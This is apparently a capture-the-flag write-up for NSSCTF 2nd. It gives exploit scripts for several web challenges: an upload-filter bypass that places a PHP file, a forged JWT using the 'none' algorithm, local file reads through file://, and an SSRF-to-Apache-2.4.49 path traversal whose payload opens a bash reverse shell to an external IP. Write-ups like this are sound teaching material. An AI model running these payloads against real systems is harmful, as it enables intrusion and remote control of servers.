NSSCTF 2nd WP
2023-08-29 20:07:23
Web
php签到 (PHP sign-in)
A trailing /. bypasses the pathinfo check, so a .php file can be uploaded directly; note that the filename has to be URL-encoded.
import requests

url = "http://node6.anna.nssctf.cn:28990/"
# filename is "1.php/." URL-encoded: the trailing "/." is what slips past the pathinfo check
result = requests.post(url, files={"file": ("%31%2e%70%68%70%2f%2e", "<?php phpinfo();?>")}).content
print(result)
2周年快乐 (Happy 2nd Anniversary)
This challenge was a real mess; I spent ages testing it and lost my shot at a top-three blood on the third challenge.
There is a hint on the D drive: curl me, the flag is at www.nssctf.cn/flag
Then it wants you to curl https://www.nssctf.cn/flag from the terminal.
Plain curl just errors out saying it doesn't exist; the challenge author is trolling.
MyJs
Register to obtain a token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZWNyZXRpZCI6MCwidXNlcm5hbWUiOiJBZWNvdXMiLCJwYXNzd29yZCI6IjEyMyIsImlhdCI6MTY5MzE0NjA3Nn0.3Wq4mpm2exS2mgqcIfHulC-unWSsBpJ7nPvhR8X_-fU
Decode it on jwt.io.
sid is the secretid from the token; passing an array instead of an index makes the secret lookup come back undefined, and since the none algorithm is accepted the token can be forged.
const jwt = require('jsonwebtoken');

global.secrets = [];
var user = {
    secretid: [],        // an array key coerces to "", so secrets[[]] is undefined
    username: 'nss',
    password: '1',
    "iat": 1693146076
}
const secret = global.secrets[user.secretid];              // undefined
var token = jwt.sign(user, secret, {algorithm: 'none'});   // unsigned token
console.log(token);
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoibnNzIiwicGFzc3dvcmQiOiIxIiwiaWF0IjoxNjkzMTQ2MDc2fQ.
Log in with it to refresh the session, then hit the update route to trigger prototype pollution; the source shows ejs template rendering among other things, so the guess is an ejs prototype-pollution RCE.
env
Mybox
?url=file:///proc/1/environ
Done.
MyBox(revenge)
file:///app/app.py reads out the source.
Clearly an SSRF point; the mybox scheme takes the place of the gopher protocol.
I dug out an SSRF PoC generator script I had collected at some point and sent a request to see what the internal port 80 was running:
mybox://127.0.0.1:80/_GET%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AUser-Agent%253A%2520curl/7.43.0%250D%250AAccept%253A%2520%252A/%252A%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%25200%250D%250A%250D%250A%250D%250A
2.4.49, an obviously vulnerable version; generate the PoC and pop a reverse shell directly.
import urllib.parse

def PAR_POST(path, content, host='127.0.0.1:80'):
    # build the raw HTTP POST request that will be smuggled through the SSRF
    PAR = "POST /{} HTTP/1.1\n" \
          "Host: {}\n" \
          "User-Agent: curl/7.43.0\n" \
          "Accept: */*\n" \
          "Content-Type: application/x-www-form-urlencoded\n" \
          "Content-Length: {}\n\n" \
          "{}\n".format(path, host, len(content), content)
    print(PAR)
    NEW_PAR = urllib.parse.quote(PAR)
    NEW_PAR = NEW_PAR.replace('%0A', '%0D%0A')   # turn line endings into CRLF after encoding
    res = 'gopher://127.0.0.1:80/_' + NEW_PAR
    return urllib.parse.quote(res)               # encode once more for the outer ?url= parameter

a = PAR_POST("cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh", "echo;bash -c 'bash -i >& /dev/tcp/43.137.36.145/3333 0>&1'")
print(a)
One odd thing about this challenge is that the SSRF against the internal port 80 sometimes errors out; I'm not sure why, but the environment is basically the same as the previous challenge, so I just went for it.
MyHurricane
A Tornado SSTI, which is rare; the source shows the WAF bans a lot of things: ( ) or and ' " curly braces and so on.
These guys grind too hard and pushed me down the board, so I had to get up in the middle of the night to look at it; a round of grilling ChatGPT plus experimenting and I fucking got it, though it feels like an unintended solution. I decided to hold this one and submit at 7 a.m.; I'm going to sleep.
Misc
Magic Docker
Starting the container deletes the flag; grill GPT a bit.
gift_in_qrcode
Anyway, once you connect it just throws the numbers at you; type them back in and it hands over the flag.